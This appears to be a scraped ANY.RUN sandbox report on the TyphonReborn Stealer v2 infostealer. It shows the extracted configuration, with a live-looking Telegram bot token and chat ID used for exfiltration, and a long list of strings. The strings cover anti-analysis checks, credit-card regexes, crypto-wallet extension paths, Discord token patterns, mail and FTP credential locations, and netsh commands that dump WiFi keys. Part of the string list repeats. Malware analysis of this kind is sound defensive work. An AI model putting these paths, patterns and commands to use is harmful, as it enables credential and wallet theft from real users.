File name: b9_v2.bin

Full analysis: https://app.any.run/tasks/83723bd2-8b9e-4190-ba91-6c3ab28be5e2
Verdict: Malicious activity
Analysis date: June 28, 2023, 09:22:37
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: typhon
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5: 5966DE489C6A199737A4A93C65D61118
SHA1: 41235C1003F1D83F0D607D3FEDC7DF5E97F0709F
SHA256: B9A0AB6783FC1E24B947C012DDE5DC639629EBF7845B0F1FB4045B721BE96565
SSDEEP: 49152:EUbowEOvygS7/1sHOqJ02nTPFdRPqxMaiYocdMvkKAG:EUcwti78OqJ7TPB7cavN

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • TYPHON detected by memory dumps

      • b9_v2.bin.exe (PID: 3004)
  • SUSPICIOUS

    • Reads the Internet Settings

      • b9_v2.bin.exe (PID: 3004)
  • INFO

    • The process checks LSA protection

      • b9_v2.bin.exe (PID: 3004)
    • Checks supported languages

      • b9_v2.bin.exe (PID: 3004)
    • Reads the computer name

      • b9_v2.bin.exe (PID: 3004)
    • Reads the machine GUID from the registry

      • b9_v2.bin.exe (PID: 3004)
    • [YARA] WLAN manipulation strings were found

      • b9_v2.bin.exe (PID: 3004)
    • Reads Environment values

      • b9_v2.bin.exe (PID: 3004)
Typhon

Process (PID 3004): b9_v2.bin.exe
C2: https://api.telegram.org/bot5803746145:AAF0CZTKujuHHwOJWU9jecx8hMRdsnNmFUk/getMe
Options:
  XORKey: JJW0V7PQ5B2B
  Token: 5803746145:AAF0CZTKujuHHwOJWU9jecx8hMRdsnNmFUk
  ChatID: 5136234727
  Mutex: 6PF1YJ
  BuildID: https://t.me/typhon_shop
  GrabberSize: 5120
  GrabberFileExtensions: .txt|.rtf|.doc|.docx|.pdf|.xlsx|.xls|.ppt|.pptx|.accdb|.png|.jpeg|.jpg|.cs|.cpp|.p12
  CryptoWallets: 1
  FileGrabber: 1
  Gaming: 1
  FTP: 1
  VPN: 1
  IM: 1
  Browser: 1
  Screenshot: 1
  AntiAnalysis: 1
  AntiCIS: 0
  BlacklistedCountries: Ukraine|Russia|Netherlands
Strings (843)
false
true
\\
\"
\n
\r
\t
\b
\f
\u
X4
null
JSON Parse: Too many closing brackets
JSON Parse: Quotation marks seems to be messed up.
:
0
--debug
Detonate.exe
aJb|v|]&o*C&`k$dpI Tx|&pC)k-V^"Y&y
Manufacturer
microsoft corporation
Model
VIRTUAL
vmware
VirtualBox
W }O%sJfx#
a}t`||]&g(e`k$dpI Txo%aX/tw7W\L#9F|y
Name
VMware
T1
SbieDll.dll
SxIn.dll
Sf2.dll
snxhk.dll
cmdvrt32.dll
ollydbg.exe
processhacker.exe
tcpview.exe
autoruns.exe
de4dot.exe
ilspy.exe
dnspy.exe
autorunsc.exe
filemon.exe
procmon.exe
regmon.exe
idaq.exe
idaq64.exe
immunitydebugger.exe
wireshark.exe
dumpcap.exe
hookexplorer.exe
lordpe.exe
petools.exe
resourcehacker.exe
x32dbg.exe
x64dbg.exe
fiddler.exe
http://www.google.com
dnspy
detect it easy
die
procmon
process monitor
process hacker
ilspy
x64dbg
x86dbg
ghidra
ida
fiddler
scylla
winhex
hxd
de4dot
SELECT * FROM Win32_PortConnector
kernel32.dll
wine_get_unix_file_name
http://ip-api.com/line/?fields=hosting
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
dnSpy
Wireshark
HashCalc
FileInsight
PDFStreamDumper
Autoruns
Process Hacker
Process Monitor
Ghidra
kernelbase.dll
ntdll.dll
user32.dll
win32u.dll
IsDebuggerPresent
CheckRemoteDebuggerPresent
GetThreadContext
CloseHandle
OutputDebugStringA
GetTickCount
SetHandleInformation
NtQueryInformationProcess
NtSetInformationThread
NtClose
NtGetContextThread
NtQuerySystemInformation
FindWindowW
FindWindowA
FindWindowExW
FindWindowExA
GetForegroundWindow
GetWindowTextLengthA
GetWindowTextA
BlockInput
NtUserBlockInput
NtUserFindWindowEx
NtUserQueryWindow
NtUserGetForegroundWindow
detonate
virus
test
malware
maltest
vmware svga
SELECT ExecutablePath, ProcessID FROM Win32_Process
ProcessID
ExecutablePath
\Programs
Select ProcessorId From Win32_processor
ProcessorId
Unknown
4AB2DFCCF4
BFEBFBFF000906E9
078BFBFF000506E3
078BFBFF00000F61
178BFBFF00830F10
0F8BFBFF000306C1
IT-ADMIN
Paul Jones
WALKER
Sandbox
timmy
tim
vboxuser
sandbox
sand box
John Doe
Emily
CurrentUser
Abby
WDAGUtilityAccount
Frank
fred
JOHN-PC
.+
John
Peter Wilson
TVM
AM
AZE
AZ
RU
KZ
KAZ
UZ
UZB
KGZ
KG
MD
MDA
TM
TKM
TJK
TJ
BY
BLR
^3[47][0-9]{13}$
^(6541|6556)[0-9]{12}$
^389[0-9]{11}$
^3(?:0[0-5]|[68][0-9])[0-9]{11}$
6(?:011|5[0-9]{2})[0-9]{12}$
^63[7-9][0-9]{13}$
^(?:2131|1800|35\\d{3})\\d{11}$
^9[0-9]{15}$
^(6304|6706|6709|6771)[0-9]{12,15}$
^(5018|5020|5038|6304|6759|6761|6763)[0-9]{8,15}$
5[1-5][0-9]{14}$
^(6334|6767)[0-9]{12}|(6334|6767)[0-9]{14}|(6334|6767)[0-9]{15}$
^(4903|4905|4911|4936|6333|6759)[0-9]{12}|(4903|4905|4911|4936|6333|6759)[0-9]{14}|(4903|4905|4911|4936|6333|6759)[0-9]{15}|564182[0-9]{10}|564182[0-9]{12}|564182[0-9]{13}|633110[0-9]{10}|633110[0-9]{12}|633110[0-9]{13}$
^(62[0-9]{14,17})$
4[0-9]{12}(?:[0-9]{3})?$
^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})$
3[47][0-9]{13}$
4MD9A52F5A2A5DB5D3F3E3D3D8A8DB3
JJW0V7PQ5B2B
0GM3a{(wr'rb &dsByA2b8Qr {7Z;PZ-[5eWh+=j
J]+{Q;=j
6PF1YJ
https://t.me/typhon_shop
5120
.txt|.rtf|.doc|.docx|.pdf|.xlsx|.xls|.ppt|.pptx|.accdb|.png|.jpeg|.jpg|.cs|.cpp|.p12
1
Ukraine|Russia|Netherlands
Crypto Wallets [BROWSER]
\Crypto Wallets [BROWSER]
Crypto Wallets [APP]
\Crypto Wallets [APP]
Software
-Qt
strDataDir
\wallets
Chrome_Binance
\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Chrome_Bitapp
\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Chrome_Coin98
\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Chrome_Equal
\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Chrome_Guild
\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Chrome_Iconex
\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfel
Chrome_Math
\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Chrome_Mobox
\Google\Chrome\User Data\Default\Local Extension Settings\fcckkdbjnoikooededlapcalpionmalo
Chrome_Phantom
\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Chrome_Tron
\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Chrome_XinPay
\Google\Chrome\User Data\Default\Local Extension Settings\bocpokimicclpaiekenaeelehdjllofo
Chrome_Ton
\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfnd
Chrome_Metamask
\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Chrome_Sollet
\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Chrome_Slope
\Google\Chrome\User Data\Default\Local Extension Settings\pocmplpaccanhmnllbbkpgfliimjljgo
Chrome_Starcoin
\Google\Chrome\User Data\Default\Local Extension Settings\mfhbebgoclkghebffdldpobeajmbecfk
Chrome_Swash
\Google\Chrome\User Data\Default\Local Extension Settings\cmndjbecilbocjfkibfbifhngkdmjgog
Chrome_Finnie
\Google\Chrome\User Data\Default\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj
Chrome_Keplr
\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Chrome_Crocobit
\Google\Chrome\User Data\Default\Local Extension Settings\pnlfjmlcjdjgkddecgincndfgegkecke
Chrome_Oxygen
\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh
Chrome_Nifty
\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Chrome_Liquality
\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Edge_Auvitas
\Microsoft\Edge\User Data\Default\Local Extension Settings\klfhbdnlcfcaccoakhceodhldjojboga
Edge_Math
\Microsoft\Edge\User Data\Default\Local Extension Settings\dfeccadlilpndjjohbjdblepmjeahlmm
Edge_Metamask
\Microsoft\Edge\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Edge_MTV
\Microsoft\Edge\User Data\Default\Local Extension Settings\oooiblbdpdlecigodndinbpfopomaegl
Edge_Rabet
\Microsoft\Edge\User Data\Default\Local Extension Settings\aanjhgiamnacdfnlfnmgehjikagdbafd
Edge_Ronin
\Microsoft\Edge\User Data\Default\Local Extension Settings\bblmcdckkhkhfhhpfcchlpalebmonecp
Edge_Yoroi
\Microsoft\Edge\User Data\Default\Local Extension Settings\akoiaibnepcedcplijmiamnaigbepmcb
Edge_Zilpay
\Microsoft\Edge\User Data\Default\Local Extension Settings\fbekallmnjoeggkefjkbebpineneilec
Edge_Exodus
\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold
Edge_Terra_Station
\Microsoft\Edge\User Data\Default\Local Extension Settings\ajkhoeiiokighlmdnlakpjfoobnjinie
Edge_Jaxx
\Microsoft\Edge\User Data\Default\Local Extension Settings\dmdimapfghaakeibppbfeokhgoikeoci
Zcash
\Zcash
Armory
\Armory
Bytecoin
\bytecoin
Jaxx
\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Exodus
\Exodus\exodus.wallet
Ethereum
\Ethereum\keystore
Electrum
\Electrum\wallets
AtomicWallet
\atomic\Local Storage\leveldb
Guarda
\Guarda\Local Storage\leveldb
Coinomi
\Coinomi\Coinomi\wallets
Litecoin
Dash
Bitcoin
\mozglue.dll
\nss3.dll
NSS_Init
PK11SDR_Decrypt
NSS_Shutdown
Failed to load NSS
oi_faggot_having_a_good_field_day_arent_you
DRIVE-
:
Grabber
Downloads
DropBox
OneDrive
TyphonReborn Stealer v2 by @lernaean_hydra0 & @StopDropNLoad
@
_
.zip
/c rmdir /S /Q "
"
cmd.exe
x
y
ProgramFiles
PROCESSOR_ARCHITEW6432
ProgramFiles(x86)
C:\Users\
\AppData\Roaming
Profiles
\logins.json
\key4.db
\places.sqlite
************************************************ * * * TyphonReborn Stealer v2 * * by @lernaean_hydra0 and @StopDropNLoad * * https://t.me/typhon_shop * ************************************************ ====...
[+] Machine name :
[+] Current date :
[+] Installed Languages :
[+] Current Language :
==================== SYSTEM DATA ==================== [+] Operating System :
[+] HWID :
[+] Installed Memory :
[+] Processor Name :
[+] Graphics Card Name :
[+] Battery status :
[+] Screen Metrics :
==================== NETWORK DATA ==================== [+] External IP :
[+] Internal IP :
[+] MAC Address :
[+] BSSID :
==================== LOCATION DATA ==================== [+] IP Based location: Country :
Region :
City :
ZIP code :
[+] BSSID based location:
Saving User Data...
\UserData.txt
\BuildID.txt
Saved User Data.
Saving Installed Softwares...
\InstalledSoftwares.txt
Saved Installed Softwares.
Saving system Info...
Saved System info
Saving Mail Clients...
Completed.
Saving Messaging softwares...
Saving FTP clients...
Saved FTP clients.
Saving browser data...
Saved browser data.
Saving Crypto wallets...
Saved crypto wallets.
Saving VPN clients...
Saved VPN clients...
Starting File Grabber...
\File Grabber
Finished File Grabbing operation.
.bat
xcxxxhcxxp 6xx50xxxxxx0xx1
TaxxxxsxxxkxxxKilxlx /Fx x/IxM xx
Tixxxmxxeoxxxut /Tx x2xxx /Nxxxoxbxrexxxxakx
/C
table
(
UNIQUE
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
\
Archive saved at:
🐍 New TyphonReborn Stealer v2 log! ---------- User Details ---------- User Name -
Machine Name -
Current Date -
Current Language -
---------- System info ---------- Operating System -
HWID -
Processor -
Graphics Card -
Battery Status -
RAM -
Screen Metrics -
---------- Network info ---------- External IP -
Internal IP -
BSSID -
MAC -
---------- Geo-Location data ---------- Country -
City -
Region -
ZIP code -
BSSID-based location -
---------- Statistics ----------
Cookies - {0}
Credit Cards - {0}
Passwords - {0}
Autofills - {0}
Crypto wallets - {0}
FTP Clients - {0}
VPN Clients - {0}
---------- //// \\\\ ---------- Build ID:
TyphonReborn Stealer v2 by @lernaean_hydra0 and @StopDropNLoad Archive status: Uploading to Telegram...
Sent log.
Document
Deleted archive
Error on client!!!
https://api.telegram.org/bot
/sendMessage?chat_id=
&text=
⛔ File not found!
/send
?chat_id=
NordVPN
NordVpn.exe*
user.config
//setting[@name='Username']/value
//setting[@name='Password']/value
\Accounts.txt
Username:
Password:
=======================
OpenVPN Connect\profiles
\profiles
ovpn
profiles\
ProtonVPN
ProtonVPN.exe
\user.config
VPN Clients
\NordVPN
\OpenVPN
\ProtonVPN
================ Drive name : {0} Drive type : {1} Total drive size : {2} GB Is drive ready : {3} Drive format : {4} ================
Drive Info.txt
root\CIMV2
SELECT * FROM Win32_Processor
Select * From Win32_ComputerSystem
TotalPhysicalMemory
MB
-1
SELECT * FROM Win32_VideoController
, (
%)
\Running Processes.txt
Process name:
PID:
Executable Path:
=================
Screenshot
_dd.MM.yyyy_HH.mm.ss
.jpeg
Screenshot.jpg
SELECT * FROM Win32_Product
>
,
.
Failed to get languages
HARDWARE\Description\System\CentralProcessor\0
Identifier
x86
x64
(Unknown)
Unknown System
SELECT * FROM win32_operatingsystem
No network adapters with an IPv4 address in the system!
http://api.ipify.org
Request failed
unknown
x2
Failed
https://api.mylnikov.org/geolocation/wifi?v=1.1&data=open&bssid=
{"result":200
"lat":
,
"lon":
"range":
Latitude:
Longitude:
Range:
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Not installed
N/A
country_name
country_code
region
r+r
postal
Not specified
axxHR0xxcHM6xxxxLy9pxcxGFxwxaS5jbxxxxxy8=
/json
ipapi.co/#c-sharp-v1.03
dd.MM.yyyy HH:mm:ss
/C chcp 65001 && netsh wlan show profile | findstr All
/C timeout /t 5 /nobreak > nul && netsh wlan show profile name="
" key=clear | findstr Key
/C timeout /t 5 /nobreak > nul && netsh wlan show networks mode=bssid
\Available Networks.txt
65001
Wifi name:
\Wifi Passwords.txt
{0} TRUE {1} FALSE {2} {3} {4}
Name: {0} Value: {1} Application: {2} Stealer: TyphonReborn Stealer v2 ==========================
email
e-mail
phone
name
username
usrname
register
login
bank
password
address
creditcard
checkout
dob
pin
zip
paypal
crypto
registration
customer
auth
key
Name: {0} Value: {1} Stealer: TyphonReborn Stealer v2 ==========================
Type: {0} Number: {1} Expiry: {2} Holder: {3} Stealer: TyphonReborn Stealer
/
URL: {0} Username: {1} Password: {2} Browser: {3} Stealer: TyphonReborn Stealer v2 ==========================
[\w-]{24}\.[\w-]{6}\.[\w-]{27}
mfa\.[\w-]{84}
(dQw4w9WgXcQ:)([^.*\['(.*)'\].*$][^"]*)
\discord\Local Storage\leveldb\
*.ldb
dQw4w9WgXcQ:
\Tokens.txt
os_crypt
encrypted_key
\discord\Local State
IM Clients
Discord
Telegram
Pidgin
ICQ
Signal
Skype
Tox
0001
\0001
Protocol:
Login:
Password:
\Pidgin Accounts.txt
.purple\accounts.xml
databases
Session Storage
Local Storage
sql
\databases
\Session Storage
\Local Storage
\sql
\config.json
Microsoft\Skype for Desktop
\Telegram Desktop\tdata
tdata
s
usertag
settings
key_data
tox
E-Mail Clients
Outlook
Thundirbird
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
SMTP Email Address
SMTP Server
POP3 Server
POP3 User Name
SMTP User Name
NNTP Email Address
NNTP User Name
NNTP Server
IMAP Server
IMAP User Name
Email
HTTP User
HTTP Server URL
POP3 User
IMAP User
HTTPMail User Name
HTTPMail Server
SMTP User
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTPMail Password
SMTP Password
\Outlook.txt
Password
2
:
{0}: {1}
^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$
^(?!:\/\/)([a-zA-Z0-9-_]+\.)*[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11}?$
\Passwords.txt
\Cookies
\Cookies_("Thunderbird").txt
cookies.sqlite
moz_cookies
host
isSecure
path
expires_utc
value
Failed to copy files to decrypt passwords
logins.json
,"logins":\[
,"potentiallyVulnerablePasswords"
},
Failed to set profile!
hostname
encryptedUsername
encryptedPassword
Thunderbird Mail Client
key3.db
key4.db
cert9.db
Gaming Clients
\UPlay
\Stem
\Steam
\Minecraft
versions
bytes
yyyy-MM-dd h:mm:ss tt
\versions.txt
VERSION:
SIZE:
DATE:
mods
\Installed Mods.txt
Mod:
Size:
Date of creation:
screenshots
\Screenshots
\Screenshots\
profile
options
servers
logs
.minecraft
Software\\Valve\\Steam
SteamPath
Apps
Apps\
Installed
No
Yes
Running
Updating
\Apps.txt
Application
GameID:
Installed:
Running:
Updating:
\ssnf
ssfn
\ssnf\
config
\configs
vdf
\configs\
Autologin User:
AutoLoginUser
Remember password:
\SteamInfo.txt
Ubisoft Game Launcher
\FileZilla\
recentservers.xml
sitemanager.xml
Server
Pass
ftp://
Host
Port
URL:
Username:
=====================
\Hosts.txt
FTP Clients
FileZilla
WinSCP
\Logins.txt
URL:
UserName:
Password:
==========================
Software\Martin Prikryl\WinSCP 2\Sessions
HostName
UserName
PortNumber
A
10
B
11
C
12
D
13
E
14
F
15
ABCDEF
l O#V5oZuzEv\&^}Gn9n'peMk)QuV
l}Nmx.||7o*k _ry
luQ"rJ*`r`po.Cv\&^}GnK }Ww-V[pj]y
l(@ b`6Q"c Y'Zvk[y|
l m%rt?mVQLuIk TD
l U#[`V, rVvLuIk TD
l Vb`0QJVvL v[!tP
l I%Xt5o^"c Y'Zvk[y|
l0O#bdvlJVvL v[!tP
lJb*W/`;|L&"IkP`T'+qqk)ms{
lN b!` x1Q)_!`p&^}' AeNp&guc|
l}#Bo`1l:c'^FuI`_uN|
lU#[x6V(p W) V>_$kF%`  }X) k1W_"V#ex^ M(PwKR y2ZTu en=a%YQ*B|
l Q%rt5T)gwC kP('U-NeNp&gud6
l O#V0W-JWv{&sPk _'Q}a\|
l <Ibx.WpJVvL v[!tP
l svpQx,mOkTtn6
l}@X^vQ"c Y'Zvk[y|
l O#b -WpJV)[&sPk _'Q}a\|
lM bV0md;oVk_&Zv`P
l O"X|)md;o Rte3
l (Q#X`*PJlw^k.p&^}' AeNp&gud6
l O#b -WpJVvL v[!tP
l px?WrV;oV] E! _'T9n'peMk)QuV
luQ$}`)Ws;mOkTtn6
l7Mbd5Ws"c Y'Zvk[y|
l N%m`3TF"`w tsC$<e' A a\)"
lqIZ?Ws-mOkTtn6
l O|0lpJV){'JuI`_uN|
l @b%c|-V-pk[ry
l V"X 2Ws`7mOkTtn6
luQ bE3`/d"dC&e>e&J }P uW
l@mh*`s ,Q &]'^P][ UL,yB)ww-V^>c"L g,Wu&
luIx0Vs ,Q:st"_uI`_u|
luO$X^5Wt"g).LdE ry
l Q%rd?o, u
l7Mbd5o 4
l V%b-ox(T^
l O#b -WpJ lvp'^]'p
l ,Nb|rVr`po.C'>w d_'UN!
lqpVcg&c_%tsE't}]%oByGw3fu
luO#,T^2od'^X!d %oxM'sKeA-|wwC#u
Opera Software
\Web Data
\Login Data
\Network\Cookies
\Local State
\Credit Cards
\Credit Cards\CreditCards_(
)_[
].txt
\Cookies\Cookies_(
\ImportantAutofills.txt
\Autofills
\Autofills\Autofills_(
logins
origin_url
username_value
password_value
credit_cards
name_on_card
expiration_month
expiration_year
cookies
host_key
httponly
secure
encrypted_value
autofill
Opera
Thunderbird
).txt
Firefox
Waterfox
K-Melon
IceDragon
Cyberfox
Blackhawk
Pale Moon
":"([^"]+)"
.compressed
bouncycastle.crypto
costura.bouncycastle.crypto.dll.compressed
costura
costura.costura.dll.compressed
costura.costura.pdb.compressed
dotnetzip
costura.dotnetzip.dll.compressed
costura.dotnetzip.pdb.compressed
system.runtime.interopservices.runtimeinformation
costura.system.runtime.interopservices.runtimeinformation.dll.compressed
No Malware configuration.

TRiD

.exe | Generic CIL Executable (.NET, Mono, etc.) (56.7)
.exe | Win64 Executable (generic) (21.3)
.scr | Windows screen saver (10.1)
.dll | Win32 Dynamic Link Library (generic) (5)
.exe | Win32 Executable (generic) (3.4)

EXIF

EXE

AssemblyVersion: 1.0.0.0
ProductVersion: 1.0.0.0
ProductName: Serpentine
OriginalFileName: Trio.exe
LegalTrademarks: -
LegalCopyright: Copyright © 2022
InternalName: Trio.exe
FileVersion: 1.0.0.0
FileDescription: Serpentine
CompanyName: -
Comments: -
CharacterSet: Unicode
LanguageCode: Neutral
FileSubtype: -
ObjectFileType: Executable application
FileOS: Win32
FileFlags: (none)
FileFlagsMask: 0x003f
ProductVersionNumber: 1.0.0.0
FileVersionNumber: 1.0.0.0
Subsystem: Windows GUI
SubsystemVersion: 6
ImageVersion: -
OSVersion: 4
EntryPoint: 0x20ec2e
UninitializedDataSize: -
InitializedDataSize: 2048
CodeSize: 2149888
LinkerVersion: 48
PEType: PE32
ImageFileCharacteristics: Executable, Large address aware, 32-bit
TimeStamp: 2040:01:09 07:56:28+00:00
MachineType: Intel 386 or later, and compatibles

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 09-Jan-2040 07:56:28
Comments: -
CompanyName: -
FileDescription: Serpentine
FileVersion: 1.0.0.0
InternalName: Trio.exe
LegalCopyright: Copyright © 2022
LegalTrademarks: -
OriginalFilename: Trio.exe
ProductName: Serpentine
ProductVersion: 1.0.0.0
Assembly Version: 1.0.0.0

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x00000080

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 3
Time date stamp: 09-Jan-2040 07:56:28
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_LARGE_ADDRESS_AWARE

Sections

.text
  Virtual Address: 0x00002000
  Virtual Size: 0x0020CC34
  Raw Size: 0x0020CE00
  Characteristics: IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
  Entropy: 7.9661

.rsrc
  Virtual Address: 0x00210000
  Virtual Size: 0x000005A4
  Raw Size: 0x00000600
  Characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
  Entropy: 4.04121

.reloc
  Virtual Address: 0x00212000
  Virtual Size: 0x0000000C
  Raw Size: 0x00000200
  Characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
  Entropy: 0.10191

Resources

Title: 1
  Entropy: 5.00112
  Size: 490
  Codepage: UNKNOWN
  Language: UNKNOWN
  Type: RT_MANIFEST

Imports

mscoree.dll
No data.
Screenshots

All screenshots are available in the full report
Total processes: 38
Monitored processes: 1
Malicious processes: 1
Suspicious processes: 0

Behavior graph

start THREAT b9_v2.bin.exe

Process information

PID: 3004
CMD: "C:\Users\admin\Desktop\b9_v2.bin.exe"
Path: C:\Users\admin\Desktop\b9_v2.bin.exe
Parent process: explorer.exe
User: admin
Integrity Level: MEDIUM
Description: Serpentine
Exit code: 0
Version: 1.0.0.0
Modules
Images
c:\users\admin\desktop\b9_v2.bin.exe
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
\Available Networks.txt
65001
Wifi name:
\Wifi Passwords.txt
{0} TRUE {1} FALSE {2} {3} {4}
Name: {0} Value: {1} Application: {2} Stealer: TyphonReborn Stealer v2 ==========================
email
e-mail
phone
name
username
usrname
register
login
bank
password
address
creditcard
checkout
dob
pin
zip
paypal
crypto
registration
customer
auth
key
Name: {0} Value: {1} Stealer: TyphonReborn Stealer v2 ==========================
Type: {0} Number: {1} Expiry: {2} Holder: {3} Stealer: TyphonReborn Stealer
/
URL: {0} Username: {1} Password: {2} Browser: {3} Stealer: TyphonReborn Stealer v2 ==========================
[\w-]{24}\.[\w-]{6}\.[\w-]{27}
mfa\.[\w-]{84}
(dQw4w9WgXcQ:)([^.*\['(.*)'\].*$][^"]*)
\discord\Local Storage\leveldb\
*.ldb
dQw4w9WgXcQ:
\Tokens.txt
os_crypt
encrypted_key
\discord\Local State
IM Clients
Discord
Telegram
Pidgin
ICQ
Signal
Skype
Tox
0001
\0001
Protocol:
Login:
Password:
\Pidgin Accounts.txt
.purple\accounts.xml
databases
Session Storage
Local Storage
sql
\databases
\Session Storage
\Local Storage
\sql
\config.json
Microsoft\Skype for Desktop
\Telegram Desktop\tdata
tdata
s
usertag
settings
key_data
tox
E-Mail Clients
Outlook
Thundirbird
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
SMTP Email Address
SMTP Server
POP3 Server
POP3 User Name
SMTP User Name
NNTP Email Address
NNTP User Name
NNTP Server
IMAP Server
IMAP User Name
Email
HTTP User
HTTP Server URL
POP3 User
IMAP User
HTTPMail User Name
HTTPMail Server
SMTP User
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTPMail Password
SMTP Password
\Outlook.txt
Password
2
:
{0}: {1}
^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$
^(?!:\/\/)([a-zA-Z0-9-_]+\.)*[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11}?$
\Passwords.txt
\Cookies
\Cookies_("Thunderbird").txt
cookies.sqlite
moz_cookies
host
isSecure
path
expires_utc
value
Failed to copy files to decrypt passwords
logins.json
,"logins":\[
,"potentiallyVulnerablePasswords"
},
Failed to set profile!
hostname
encryptedUsername
encryptedPassword
Thunderbird Mail Client
key3.db
key4.db
cert9.db
Gaming Clients
\UPlay
\Stem
\Steam
\Minecraft
versions
bytes
yyyy-MM-dd h:mm:ss tt
\versions.txt
VERSION:
SIZE:
DATE:
mods
\Installed Mods.txt
Mod:
Size:
Date of creation:
screenshots
\Screenshots
\Screenshots\
profile
options
servers
logs
.minecraft
Software\\Valve\\Steam
SteamPath
Apps
Apps\
Installed
No
Yes
Running
Updating
\Apps.txt
Application
GameID:
Installed:
Running:
Updating:
\ssnf
ssfn
\ssnf\
config
\configs
vdf
\configs\
Autologin User:
AutoLoginUser
Remember password:
\SteamInfo.txt
Ubisoft Game Launcher
\FileZilla\
recentservers.xml
sitemanager.xml
Server
Pass
ftp://
Host
Port
URL:
Username:
=====================
\Hosts.txt
FTP Clients
FileZilla
WinSCP
\Logins.txt
URL:
UserName:
Password:
==========================
Software\Martin Prikryl\WinSCP 2\Sessions
HostName
UserName
PortNumber
A
10
B
11
C
12
D
13
E
14
F
15
ABCDEF
l O#V5oZuzEv\&^}Gn9n'peMk)QuV
l}Nmx.||7o*k _ry
luQ"rJ*`r`po.Cv\&^}GnK }Ww-V[pj]y
l(@ b`6Q"c Y'Zvk[y|
